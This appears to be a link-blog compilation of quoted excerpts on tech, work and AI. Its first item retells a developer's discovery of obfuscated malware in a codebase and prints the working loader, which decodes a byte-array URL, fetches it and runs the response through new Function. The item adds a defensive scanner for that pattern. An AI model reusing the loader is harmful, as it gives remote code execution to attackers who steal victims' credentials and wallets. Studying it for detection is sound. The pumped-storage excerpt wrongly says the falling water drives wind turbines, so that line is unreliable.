• Hacked

    David Dodda talking about his recent escape from being hacked by an ingenious method.

    Before hitting npm start, I threw this prompt at my Cursor AI agent:

    “Before I run this application, can you see if there are any suspicious code in this codebase? Like reading files it shouldn’t be reading, accessing crypto wallets etc.”

    And holy sh*t.

    Sitting right in the middle of server/controllers/userController.js was this beauty:

    //Get Cookie  
    (async () => {  
        const byteArray = [  
            104, 116, 116, 112, 115, 58, 47, 47, 97, 112, 105, 46, 110, 112, 111, 105,  
            110, 116, 46, 105, 111, 47, 50, 99, 52, 53, 56, 54, 49, 50, 51, 57, 99, 51,  
            98, 50, 48, 51, 49, 102, 98, 57  
        ];  
        const uint8Array = new Uint8Array(byteArray);  
        const decoder = new TextDecoder('utf-8');  
        axios.get(decoder.decode(uint8Array))  
            .then(response => {  
                new Function("require", response.data.model)(require);  
            })  
            .catch(error => { });  
    })();
    
    

    Obfuscated. Sneaky. Evil. And 100% active – embedded between legitimate admin functions, ready to execute with full server privileges the moment admin routes were accessed.

    I decoded that byte array: https://api.npoint.io/2c458612399c3b2031fb9

    When I first hit the URL, it was live. I grabbed the payload. Pure malware. The kind that steals everything – crypto wallets, files, passwords, your entire digital existence.

    Here’s the kicker: the URL died exactly 24 hours later. These guys weren’t messing around – they had their infrastructure set up to burn evidence fast.

    AI saved the day.
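A static check for the loader shape in the snippet above (a byte array that decodes to a URL, a network fetch, and the response run through `new Function`), added here as an example and not taken from David Dodda's post. The rule names, the eight-element threshold and the `example.invalid` URL are assumptions, and the sample source is constructed.

```javascript
// Added example: static triage for the loader pattern in the post above.
// Heuristic only; rule names and thresholds are assumptions of this sketch.
const SINK = /\bnew\s+Function\s*\(|\beval\s*\(|\bvm\.runIn\w+\s*\(/;
const FETCH = /\baxios\s*\.\s*\w+\s*\(|\bfetch\s*\(|\bhttps?\.(?:get|request)\s*\(/;
// An array literal of 8 or more integers of up to three digits.
const INT_ARRAY = /\[\s*((?:\d{1,3}\s*,\s*){7,}\d{1,3})\s*,?\s*\]/g;

// Decode every numeric array that is valid byte data and reads as printable ASCII.
function decodeByteArrays(source) {
  const decoded = [];
  for (const match of source.matchAll(INT_ARRAY)) {
    const bytes = match[1].split(',').map((n) => Number(n.trim()));
    if (bytes.some((b) => b > 255)) continue;
    const text = new TextDecoder('utf-8').decode(Uint8Array.from(bytes));
    if (/^[\x20-\x7e]+$/.test(text)) decoded.push(text);
  }
  return decoded;
}

// Return findings for one file's source text; nothing is executed or fetched.
function scanSource(source) {
  const findings = [];
  for (const text of decodeByteArrays(source)) {
    const rule = /^https?:\/\//i.test(text) ? 'encoded-url' : 'encoded-string';
    findings.push({ rule, detail: text });
  }
  const sink = source.match(SINK);
  if (sink) findings.push({ rule: 'dynamic-code', detail: sink[0].trim() });
  if (sink && FETCH.test(source)) {
    findings.push({ rule: 'remote-code-loader', detail: 'network call and code sink in one file' });
  }
  return findings;
}

// Constructed sample with the same shape as the quoted snippet; the URL is a placeholder.
const url = 'https://example.invalid/model';
const sample = `
(async () => {
  const byteArray = [${Array.from(new TextEncoder().encode(url)).join(', ')}];
  axios.get(new TextDecoder('utf-8').decode(new Uint8Array(byteArray)))
    .then(response => { new Function("require", response.data.model)(require); })
    .catch(error => { });
})();`;

for (const f of scanSource(sample)) console.log(`${f.rule}: ${f.detail}`);
```

Running this over a cloned repository before `npm start` only narrows where to look; a hit on `remote-code-loader` is the cue to read that file by hand in an isolated environment.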

  • Pumped storage plant

    I read about the concept of a pumped storage plant in 2020. Now I am seeing it being discussed in India.

    The Daily Brief explaining the concept with a nifty little diagram.

    Here’s how a PSP basically works. It has electric pumps that are powered using solar. So, when you have excess solar power at midday, the PSP pumps water uphill from a lower reservoir to an upper one. Come sunset, when solar dies and demand spikes the PSP releases the same water, whose downhill gravity powers wind turbines. The water also gets stored back again in the lower reservoir.

    In short, a PSP uses energy conversion to ensure that excess power is never wasted.

    Image credits: The Daily Brief

  • Pretending

    The Oatmeal talking about AI art.

    As a kid, I had one of those little Casio keyboards where you could hit a button and it’d automatically play a song.

    I remember hitting the button.

    I remember standing there, pretending to make music.

    That’s how I see AI art.

    Standing there.

    Pretending.

    Pretending. This resonated with me. At times I have had this feeling whenever I used AI. While generating proposals. While generating code. While generating ideas. It seems I am pretending to work.

    So is the future of work that we all pretend to work?

  • Pride in the little jobs

    Ted Lamade writing about taking whatever chances you get, especially the insignificant ones. He then shares the quote below by William McRaven from his book ‘The Wisdom of the Bullfrog’.

    I found in my career that if you take pride in the little jobs, people will think you worthy of the bigger jobs

  • Hazardous state + environmental conditions = accident

    This comment by kqr on the news that a Ryanair flight landed at Manchester airport with just six minutes of fuel left.

    In safety-critical systems, we distinguish between accidents (actual loss, e.g. lives, equipment, etc.) and hazardous states. The equation is

    hazardous state + environmental conditions = accident

    Since we can only control the system, and not its environment, we focus on preventing hazardous states, rather than accidents. If we can keep the system out of all hazardous states, we also avoid accidents. (Trying to prevent accidents while not paying attention to hazardous states amounts to relying on the environment always being on our side, and is bound to fail eventually.)

    One such hazardous state we have defined in aviation is “less than N minutes of fuel remaining when landing”. If an aircraft lands with less than N minutes of fuel on board, it would only have taken bad environmental conditions to make it crash, rather than land. Thus we design commercial aviation so that planes always have N minutes of fuel remaining when landing. If they don’t, that’s a big deal: they’ve entered a hazardous state, and we never want to see that. (I don’t remember if N is 30 or 45 or 60 but somewhere in that region.)

    For another example, one of my children loves playing around cliffs and rocks. Initially he was very keen on promising me that he wouldn’t fall down. I explained the difference between accidents and hazardous states to him in children’s terms, and he realised slowly that he cannot control whether or not he has an accident, so it’s a bad idea to promise me that he won’t have an accident. What he can control is whether or not bad environmental conditions lead to an accident, and he does that by keeping out of hazardous states. In this case, the hazardous state would be standing less than a child-height within a ledge when there is nobody below ready to catch. He can promise me to avoid that, and that satisfies me a lot more than a promise to not fall.

  • It’s much easier to fund a promise than a real business

    Om Malik’s interview with Rodney Brooks.

    Om: It’s much easier to fund the promise than a real business, because real businesses have limitations on how fast they can grow. Whereas if you don’t know, you can live (and fund) the dream. There’s nothing wrong with living the dream—that’s how you get to fund crazy things in this industry. But people doing more rational things do pay the price.

    You’ve been in robotics for a long time. There are misconceptions about robots and robotics. The biggest fallacy is that we think of them in human form. Ten years later, that idea of a humanoid has become so pervasive. We don’t think about things that do robotic tasks, like ad systems that serve ads constantly—they are also robots.

    Rodney: The robots—they’re not embodied. I always say about a physical robot, the physical appearance makes a promise about what it can do. The Roomba was this little disc on the floor. It didn’t promise much—you saw it and thought, that’s not going to clean the windows. But you can imagine it cleaning the floor. But the human form sort of promises it can do anything a human can. And that’s why it’s so attractive to people—it’s selling a promise that is amazing.

    Om’s statement highlights the current state of AI. Everybody is funding the dream.

    Rodney’s statement highlights the business idea which actually needs funding but isn’t getting one.

  • Politics

    Matheus Lima explaining politics at the workplace.

    Politics is just how humans coordinate in groups. It’s the invisible network of relationships, influence, and informal power that exists in every organization. You can refuse to participate, but that doesn’t make it go away. It just means decisions get made without you.

    Think about the last time a terrible technical decision got pushed through at your company. Maybe it was adopting some overcomplicated architecture, or choosing a vendor that everyone knew was wrong, or killing a project that was actually working. I bet if you dig into what happened, you’ll find it wasn’t because the decision-makers were stupid. It’s because the people with the right information weren’t in the room. They “didn’t do politics.”

    Meanwhile, someone who understood how influence works was in that room, making their case, building coalitions, showing they’d done their homework. And their idea won. Not because it was better, but because they showed up to play while everyone else was “too pure” for politics.

    Ideas don’t speak. People do. And the people who understand how to navigate organizational dynamics, build relationships, and yes, play politics? Their ideas get heard.

    When you build strong relationships across teams, understand what motivates different stakeholders, and know how to build consensus, you’re doing politics. When you take time to explain your technical decisions to non-technical stakeholders in language they understand, that’s politics. When you grab coffee with someone from another team to understand their challenges, that’s politics too.

    Good politics is just being strategic about relationships and influence in the service of good outcomes.

    I too thought of politics at the workplace as something to be avoided. But politics doesn’t mean backstabbing your opponent. As per Wikipedia it means:

    Politics is the set of activities that are associated with making decisions in groups, or other forms of power relations among individuals, such as the distribution of status or resources.

  • Friction vs effort

    Jameel Ur Rahman shares his take on how overcoming friction leads to growth. We have seen this in nature, where the struggle of a butterfly to come out of its cocoon helps develop its wings. But this comment by gwd makes a distinction between friction and effort.

    Can I make a distinction between “friction” and “effort”?

    If you’re riding a bike up a hill, you can’t go up without effort. But not all of your effort is actually moving you up the hill — some of it is being lost in friction: inefficiencies in your muscles, friction in your gears and wheel and chain, wind resistance.

    Similarly, you can’t learn anything without effort; but it’s often the case that effort you put in ends up wasted: if you’re learning a language, time spent looking for content rather than studying content is friction; effort spent forcing yourself to read something that’s too hard is effort you could have spent more profitably elsewhere.

    Put that way, we should minimize friction, so that we can maximize the amount our effort goes towards actually growing.

  • A market for lemons

    Frank Chimero referring to the paper by George Akerlof and explaining what a market for lemons means. He then goes ahead and explains that we are in the lemon stage of the internet.

    The idea is called “a market for lemons.” The phrase comes from a 1970 paper by George Akerlof that explains how information asymmetry between buyers and sellers can undermine a marketplace. Akerlof asks us to imagine ourselves buying a used car. Some cars on the lot are reliable, well-maintained gems. Other cars are lemons, the kinds of cars that can make it off the lot but are disasters waiting to happen. The sellers know which cars are which, but you, as a buyer, can’t tell the difference. That information asymmetry affects the average price in the market and eventually impacts the overall market dynamics.

    The thinking goes like this: if a buyer can’t distinguish between good and bad, everything gets priced somewhere in the middle. If you’re selling junk, this is fantastic news—you’ll probably get paid more than your lemon is worth. If you’re selling a quality used car, this price is insultingly low. As a result, people with good cars leave the market to sell their stuff elsewhere, which pushes the overall quality and price down even further, until eventually all that’s left on the market are lemons.

    I think we’re in the lemon stage of the internet.

  • From AI will replace humans to AI is in a bubble

    Stephanie Palazzolo writing for The Information.

    Not only has the one-year-old Thinking Machines not yet released a product, it hasn’t talked publicly about what that product will be. Even some of the company’s investors don’t have a very good idea of what it is working on. While raising capital for Thinking Machines earlier this year and late last year, Murati shared few details about what it would be building, prospective investors said.

    “It was the most absurd pitch meeting,” one investor who met with Murati said. “She was like, ‘So we’re doing an AI company with the best AI people, but we can’t answer any questions.’”

    Despite that vagueness, Murati raised $2 billion in funding—the largest seed round ever—at a $10 billion pre-investment valuation from top Silicon Valley VC firms including Andreessen Horowitz, Accel and GV. The investors also made the highly unusual decision to give her total veto power over the board of directors. (Thinking Machines is using Nvidia-powered servers it rents from Google Cloud, whose ultimate parent Alphabet also oversees GV.)

    When 2025 started, all I could read was that AI is going to replace humans. Now it’s all about—AI is in a bubble. These valuations don’t make sense.

    I don’t know what to believe anymore. But I am bookmarking this in case the bubble explodes in the future.
